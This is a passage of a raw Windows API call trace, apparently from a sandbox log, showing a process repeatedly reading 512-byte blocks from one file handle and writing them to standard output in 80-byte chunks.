lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] GetFileType (hFile=0x50) returned 0x1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] GetFileType (hFile=0x50) returned 0x1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] GetFileType (hFile=0x50) returned 0x1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] GetFileType (hFile=0x50) returned 0x1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.940] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.940] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.940] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.940] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] GetFileType (hFile=0x50) returned 0x1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] GetFileType (hFile=0x50) returned 0x1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] GetFileType (hFile=0x50) returned 0x1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] GetFileType (hFile=0x50) returned 0x1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] GetFileType (hFile=0x50) returned 0x1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] GetFileType (hFile=0x50) returned 0x1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] WriteFile (in: 
hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] GetFileType (hFile=0x50) returned 0x1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] GetFileType (hFile=0x50) returned 0x1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.941] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.941] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.941] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.941] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] GetFileType (hFile=0x50) returned 0x1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] GetFileType (hFile=0x50) returned 0x1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.941] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0202.941] GetFileType (hFile=0x50) returned 0x1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] GetFileType (hFile=0x50) returned 0x1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] GetFileType (hFile=0x50) returned 0x1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] GetFileType (hFile=0x50) returned 0x1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] GetFileType (hFile=0x50) returned 0x1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 
[0202.942] GetFileType (hFile=0x50) returned 0x1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.942] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.942] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.942] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.942] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] GetFileType (hFile=0x50) returned 0x1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] GetFileType (hFile=0x50) returned 0x1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.943] GetFileType (hFile=0x50) returned 0x1 [0202.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.943] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.943] GetFileType (hFile=0x50) returned 0x1 [0202.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.943] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, 
lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.943] GetFileType (hFile=0x50) returned 0x1 [0202.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.943] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.943] GetFileType (hFile=0x50) returned 0x1 [0202.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.943] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.943] GetFileType (hFile=0x50) returned 0x1 [0202.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.943] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.943] GetFileType (hFile=0x50) returned 0x1 [0202.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.943] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.944] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.944] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.944] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.944] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] GetFileType (hFile=0x50) returned 0x1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] GetFileType (hFile=0x50) returned 0x1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] GetFileType (hFile=0x50) returned 0x1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] GetFileType (hFile=0x50) returned 0x1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] GetFileType (hFile=0x50) returned 0x1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] GetFileType (hFile=0x50) returned 0x1 [0202.944] _get_osfhandle (_FileHandle=1) returned 
0x50 [0202.944] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] GetFileType (hFile=0x50) returned 0x1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] GetFileType (hFile=0x50) returned 0x1 [0202.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.945] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.945] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.945] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.945] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.945] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.945] GetFileType (hFile=0x50) returned 0x1 [0202.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.945] GetFileType (hFile=0x50) returned 0x1 [0202.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.945] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) 
returned 1 [0202.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.945] GetFileType (hFile=0x50) returned 0x1 [0202.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.945] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.945] GetFileType (hFile=0x50) returned 0x1 [0202.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.947] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.947] GetFileType (hFile=0x50) returned 0x1 [0202.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.947] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.948] GetFileType (hFile=0x50) returned 0x1 [0202.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.948] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.948] GetFileType (hFile=0x50) returned 0x1 [0202.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.948] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.948] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0202.948] GetFileType (hFile=0x50) returned 0x1 [0202.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.948] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.948] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.948] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.948] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.948] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.948] GetFileType (hFile=0x50) returned 0x1 [0202.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.948] GetFileType (hFile=0x50) returned 0x1 [0202.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.948] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.948] GetFileType (hFile=0x50) returned 0x1 [0202.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.948] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.948] GetFileType (hFile=0x50) returned 0x1 [0202.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.948] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.949] GetFileType (hFile=0x50) returned 0x1 [0202.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.949] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.949] GetFileType (hFile=0x50) returned 0x1 [0202.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.949] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.949] GetFileType (hFile=0x50) returned 0x1 [0202.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.949] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.949] GetFileType (hFile=0x50) returned 0x1 [0202.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.949] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.949] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.949] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.959] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.959] ReadFile 
(in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.959] GetFileType (hFile=0x50) returned 0x1 [0202.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.959] GetFileType (hFile=0x50) returned 0x1 [0202.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.959] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.959] GetFileType (hFile=0x50) returned 0x1 [0202.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.959] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.959] GetFileType (hFile=0x50) returned 0x1 [0202.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.959] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.959] GetFileType (hFile=0x50) returned 0x1 [0202.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.960] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.960] GetFileType (hFile=0x50) returned 0x1 [0202.960] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0202.960] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.960] GetFileType (hFile=0x50) returned 0x1 [0202.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.960] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.960] GetFileType (hFile=0x50) returned 0x1 [0202.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.960] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, 